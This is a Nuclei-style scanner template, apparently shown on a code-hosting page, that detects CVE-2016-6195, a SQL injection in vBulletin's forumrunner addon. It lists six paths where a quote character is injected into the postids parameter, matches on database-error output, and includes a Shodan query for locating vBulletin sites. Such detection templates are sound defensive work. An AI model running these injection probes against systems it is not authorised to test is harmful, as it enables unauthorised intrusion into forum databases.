59 lines
2.3 KiB
YAML
59 lines
2.3 KiB
YAML
id: CVE-2016-6195
|
|
|
|
info:
|
|
name: vBulletin <= 4.2.3 - SQL Injection
|
|
author: MaStErChO
|
|
severity: critical
|
|
description: |
|
|
vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
|
|
remediation: |
|
|
Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
|
|
reference:
|
|
- https://www.cvedetails.com/cve/CVE-2016-6195/
|
|
- https://www.exploit-db.com/exploits/38489
|
|
- https://enumerated.wordpress.com/2016/07/11/1/
|
|
- http://www.vbulletin.org/forum/showthread.php?t=322848
|
|
- https://github.com/drewlong/vbully
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-6195
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00284
|
|
epss-percentile: 0.65416
|
|
cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 6
|
|
vendor: vbulletin
|
|
product: vbulletin
|
|
shodan-query: title:"Powered By vBulletin"
|
|
tags: cve2016,cve,vbulletin,sqli,forum,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "type=dberror"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- 503
|
|
condition: or
|
|
# digest: 4a0a0047304502201d3f5505147a2436c4abe3f1c341fe209327797eb297587bf15a68c5321be2fc0221009002c5c228d53f60792cc0d97f32e82d17c7d571d4d3dfb92f8ec731df341e55:922c64590222798bb761d5b6d8e72950 |